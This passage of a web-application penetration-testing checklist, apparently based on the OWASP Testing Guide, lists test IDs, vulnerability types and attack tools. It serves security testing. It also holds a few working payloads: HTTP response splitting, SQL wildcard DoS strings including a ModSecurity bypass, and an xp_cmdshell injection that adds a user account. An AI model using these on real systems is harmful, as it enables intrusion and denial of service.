CM-005  Testing for File Extensions Handling
        Vulnerability: File extensions handling
        Comment: Determining how web servers handle requests corresponding to files having different extensions may help to understand web server behaviour depending on the kind of files we try to access (.asa, .inc, .db)
        Tools: Curl, wget, web mirroring tool, Nessus, Nikto
CM-006  Old, backup and unreferenced files
        Vulnerability: Old, backup and unreferenced files
        Comment: Accessing and downloading the backup files which can escape the file restrictions
        Tools: HTTrack, Wikto/Nikto, Goolag, Spike Proxy
CM-007  Infrastructure and Application Admin Interfaces
        Vulnerability: Access to Admin interfaces
        Comment: Try to exploit the admin functions such as User Allocation, Site design/layout, Data manipulation, Configs
CM-008  Testing for HTTP Methods and XST
        Vulnerability: HTTP Methods enabled, XST permitted, HTTP Verb
        Tools: Netcat, TamperIE, Webscarab etc

Authentication Testing
AT-001  Credentials transport over an encrypted channel
        Vulnerability: Credentials transport over an encrypted channel
        Tools: Wireshark, Proxy, Webscarab
AT-002  Testing for user enumeration
        Vulnerability: User enumeration
        Comment: Enumerate all possible valid userids by interacting with the authentication mechanism of the application
        Tools: Webscarab
AT-003  Testing for Guessable (Dictionary) User Account
        Vulnerability: Guessable user account
        Tools: Brutus, THC Hydra, Burp Intruder, Cain & Abel
AT-004  Brute Force Testing
        Vulnerability: Credentials Brute forcing
        Tools: Brutus, THC Hydra, Burp Intruder, Cain & Abel, John the Ripper, OPHCRACK, Rainbow Tables
AT-005  Testing for bypassing authentication schema
        Vulnerability: Bypassing authentication schema
        Tools: Webscarab
AT-006  Testing for vulnerable remember password and pwd reset
        Vulnerability: Vulnerable remember password, weak pwd reset
        Comment: Understand the password reset procedure, the secret questions asked etc
AT-007  Testing for Logout and Browser Cache Management
        Vulnerability: Logout function not properly implemented, browser cache weakness
        Comment: Session timeout, Logout etc implemented
        Tests: HTTP.Session.invalidate()-Java, Java.Session.abandon()-.Net implemented. Press back button/reload check, check presence of logout btns in all page, User browser closed instead of session invalidate check, insert Set-Cookie check, Time out interval, Timeout not by client check, Modify the session expiration time at clientside, Check META Cache-Control in HTML
        Tools: Webscarab, Add N Edit Cookies
AT-008  Testing for CAPTCHA
        Vulnerability: Weak Captcha implementation
        Comment: Completely Automated Public Turing
        Tests: CAPTCHA Image Complexity, Set of possible answers, Analysing the return encrypted Captcha code, identify the parameters, Reuse the session id of known CAPTCHA, Send old CAPTCHA value with old ID, Send old decoded CAPTCHA value with old session id
        Tools: CAPTCHA Decoders - PWNtcha, The Captcha Breaker, Captcha Decoder, Online Captcha Decoder.
AT-009  Testing Multiple Factors Authentication
        Vulnerability: Weak Multiple Factors Authentication
        Comment: One-time password (OTP) generator token. Grid Card, Scratch Card, or any information that only the legitimate user is supposed to have in his wallet. Crypto devices like USB tokens or smart cards, equipped with X.509 certificates. Randomly generated OTPs transmitted through a GSM SMS messages [SMSOTP]
AT-010  Testing for Race Conditions
        Vulnerability: Race Conditions vulnerability
        Comment: A race condition is a flaw that produces an unexpected result when the timing of actions impact other actions. An example may be seen on a multithreaded application where actions are being performed on the same data. Race conditions, by their very nature, are difficult to test for

Session Management
SM-001  Testing for Session Management Schema
        Vulnerability: Bypassing Session Management Schema, Weak Session Token
        Comment: CookieCollection, CookieReverseEngineering, CookieManipulation.
        Tests: Unencrypted Cookie Transport, Presence of persistent cookies, Cache-Control Settings, SessionID Analysis - Sensitive Info, Randomness, Cryptanalysis, BruteForce
        Tools: Webscarab, BurpProxy, FoundStone Cookie Digger
SM-002  Testing for Cookies attributes
        Vulnerability: Cookies are set not HTTP Only, Secure, and no time validity
        Tests: ";secure", HTTPOnly - Always set, "; domain=app.mysite.com", "; path=/myapp/", expires-Future Value => inspect for sensitive data
        Tools: Webscarab
SM-003  Testing for Session Fixation
        Vulnerability: Session Fixation
        Comment: The application doesn't renew the cookie after auth - Session hijacking
        Tools: Webscarab, BurpProxy, Paros, TamperIE/Data
SM-004  Testing for Exposed Session Variables
        Vulnerability: Exposed sensitive session variables
SM-005  Testing for CSRF
        Vulnerability: CSRF

Authorization Testing
AZ-001  Testing for Path Traversal
        Vulnerability: Path Traversal
        Tools: Grep, Nikto, Burp Suite, Paros, Webscarab
AZ-002  Testing for bypassing authorization schema
        Vulnerability: Bypassing authorization schema
AZ-003  Testing for Privilege Escalation
        Vulnerability: Privilege Escalation
        Comment: vertical escalation when it is possible to access resources granted to more privileged accounts (e.g., acquiring administrative privileges for the application), and to horizontal escalation when it is possible to access resources granted to a similarly configured account (e.g., in an online banking application, accessing information related to a different user).
        Tests: Testing for role/privilege manipulation - Manipulate the values of hidden variables, analyse the error messages etc
        Tools: Proxy Tools

Business Logic Testing
BL-001  Testing for Business Logic
        Vulnerability: Bypassable business logic
        Comment: Bypass the actual workflow required to complete a process

Data Validation Testing
DV-001  Testing for Reflected Cross Site Scripting
        Vulnerability: Reflected XSS
        Comment: Check for input validation, try out different combinations of XSS vectors
        Tests: Automated tools fails
        Tools: CAL9000, Rsnake XSSdb, XSSMe firefox addon, XSS proxy, WebScarab, Rat proxy, Burp Proxy
DV-002  Testing for Stored Cross Site Scripting
        Vulnerability: Stored XSS
        Comment: Impacts: *Hijacking another user's browser *Capturing sensitive information viewed by application users *Pseudo defacement of the application *Port scanning of internal hosts ("internal" in relation to the users of the web application) *Directed delivery of browser-based exploits *Other malicious activities
        Tools: CAL9000, Hackvertor, XSSProxy, BeEF, WebScarab
DV-003  Testing for DOM based Cross Site Scripting
        Vulnerability: DOM XSS
        Comment: This happens mostly due to poor javascript coding.
        Tests: Automated tools fails
DV-004  Testing for Cross Site Flashing
        Vulnerability: Cross Site Flashing
        Comment: Working for actionscript 2.0 files
        Tests: 1.Decompile 2.Undefined Variables 3.Unsafe methods 4.Include malicious SWF
        Tools: SWFIntruder, Flare, Flasm
DV-005  SQL Injection
        Vulnerability: SQL Injection
        Comment: 1.Inband (retrieved data in the webpage) 2.Out-of-band (data sent through email or other means) 3.Inferential (Analyse the behaviour of Db server)
        Tests: Test Categories: 1.Authentication Forms, 2.Search Engine, 3.E-Commerce sites. Tests: 1.Heuristic Analysis (' , : , --) 2.Construct SQL Injection Vectors 3.Analyse Error Messages
        Tools: OWASP SQLiX, SQL Power Injector, sqlbftools, sqlmap, SqlDumper, sqlninja
DV-006  LDAP Injection
        Vulnerability: LDAP Injection
        Tests: Ability to: Access unauthorized content, Evade Application restrictions, Gather unauthorized information, Add or modify Objects inside LDAP tree structure.
        Tools: Softerra LDAP Browser
DV-007  ORM Injection
        Vulnerability: ORM Injection
        Comment: Object Relational Mapping tool. ORM tools include Hibernate for Java, NHibernate for .NET, ActiveRecord for Ruby on Rails, EZPDO for PHP and many others.
        Tests: Black box testing for ORM Injection vulnerabilities is identical to SQL Injection testing
DV-008  XML Injection
        Vulnerability: XML Injection
DV-009  SSI Injection
        Vulnerability: SSI Injection
DV-010  XPath Injection
        Vulnerability: XPath Injection
        Comment: Unlike SQL, there are not ACLs enforced, as our query can access every part of the XML document
        Tools: Burp Suit, WebScarab, Paros
DV-011  IMAP/SMTP Injection
        Vulnerability: IMAP/SMTP Injection
        Tests: Exploitation of vulnerabilities in the IMAP/SMTP protocol, Application restrictions evasion, Anti-automation process evasion, Information leaks, Relay/SPAM
DV-012  Code Injection
        Vulnerability: Code Injection
DV-013  OS Commanding
        Vulnerability: OS Commanding
        Tools: Webscarab
DV-014  Buffer overflow
        Vulnerability: Buffer overflow
        Tests: Testing for heap overflow vulnerability, Testing for stack overflow vulnerability, Testing for format string vulnerability
        Tools: OllyDbg, Spike, Brute Force Binary Tester (BFB), Metasploit. RATS, Flawfinder and ITS4 are available for analyzing C-style languages
DV-015  Incubated vulnerability
        Vulnerability: Incubated vulnerability
        Tools: XSS-proxy, Paros, Burp, Metasploit
DV-016  Testing for HTTP Splitting/Smuggling
        Vulnerability: HTTP Splitting, Smuggling
        Comment: Outcome: Cache Poisoning/XSS
        Tests: param=foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2035%0d%0a%0d%0a<html>Sorry,%20System%20Down</html>

Denial of Service Testing
DS-001  Testing for SQL Wildcard Attacks
        Vulnerability: SQL Wildcard vulnerability
        Comment: Starting with % and ending with % will generally cause longer running queries. Some search implementations may cache search results. During the testing, every search query should be slightly different to avoid this.
        Tests:
        '%_[^!_%/%a?F%_D)_(F%)_%([)({}%){()}$&N%_)$*()$*R"_)][%](%[x])%a][$*"$-9]_%'
        '%64_[^!_%65/%aa?F%64_D)_(F%64)_%36([)({}%33){()}$&N%55_)$*()$*R"_)][%55](%66[x])%ba][$*"$-9]_%54' bypasses modsecurity
        _[r/a)_ _(r/b)_ _(r-d)_
        %n[^n]y[^j]l[^k]d[^l]h[^z]t[^k]b[^q]t[^q][^n]!%
        %_[aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa[! -z]@$!_%
DS-002  Locking Customer Accounts
        Vulnerability: Locking Customer Accounts
        Tests: Wrong Attempts; Valid Username enumeration: Login Page, New User Reg Page, Password Reset Page
DS-003  Testing for DoS Buffer Overflows
        Vulnerability: Buffer Overflows
        Comment: if you have received a response (or a lack of) that makes you believe that the overflow has occurred, attempt to make another request to the server and see if it still responds.
DS-004  User Specified Object Allocation
        Vulnerability: User Specified Object Allocation
        Comment: If the application does not pose an upper limit to the number of items that can be in any given moment inside the user electronic cart, you can write an automated script that keeps adding items to the user cart until the cart object fills the server memory.
DS-005  User Input as a Loop Counter
        Vulnerability: User Input as a Loop Counter
DS-006  Writing User Provided Data to Disk
        Vulnerability: Writing User Provided Data to Disk
DS-007  Failure to Release Resources
        Vulnerability: Failure to Release Resources
DS-008  Storing too Much Data in Session
        Vulnerability: Storing too Much Data in Session

Web Services Testing
WS-001  WS Information Gathering
        Vulnerability: N.A.
        Tests: curl --request POST --header "Content-type: text/xml" --data @my_request.xml ; http://api.google.com/search/beta2
        Tools: Net Square wsPawn, SOAPClient4XG, CURL, Perl SOAPlite, OWASP WebScarab: Web Services plugin, WSDigger
WS-002  Testing WSDL
        Vulnerability: WSDL Weakness
        Tools: WebScarab, WSDigger
WS-003  XML Structural Testing
        Vulnerability: Weak XML Structure
        Tools: WebScarab, WSDigger
WS-004  XML content-level Testing
        Vulnerability: WS XML content-level
        Tests: https://www.ws.com/accountinfo?accountnumber=12039475' exec master..xp_cmdshell 'net user Vxr pass /Add
        Tools: WebScarab, MetaSploit
WS-005  HTTP GET parameters/REST Testing
        Vulnerability: WS HTTP GET parameters/REST
        Tests: &userId=asi9485jfuhe92
WS-006  Naughty SOAP attachments
        Vulnerability: WS Naughty SOAP attachments
WS-007  Replay Testing
        Vulnerability: WS Replay Testing
        Tools: WebScarab, Ethereal, WireShark, TCPReplay

Ajax Testing
AJ-001  AJAX Vulnerabilities
        Vulnerability: N.A.
        Comment: * XMLHttpRequest Vulnerabilities, SQL Injection, XSS, DOM based XSS, JSON/XML/XSLT Injection * AJAX Bridging - Cross website requests are sent through this method * Cross Site Request Forgery (CSRF) * DOS - Multiple XMLHttpRequests
AJ-002  AJAX Testing
        Vulnerability: AJAX weakness
        Comment: Parse the HTML and JavaScript files and using a proxy to observe traffic.
        Tools: Proxy tools, Firebug, OWASP Sprajax
XIII.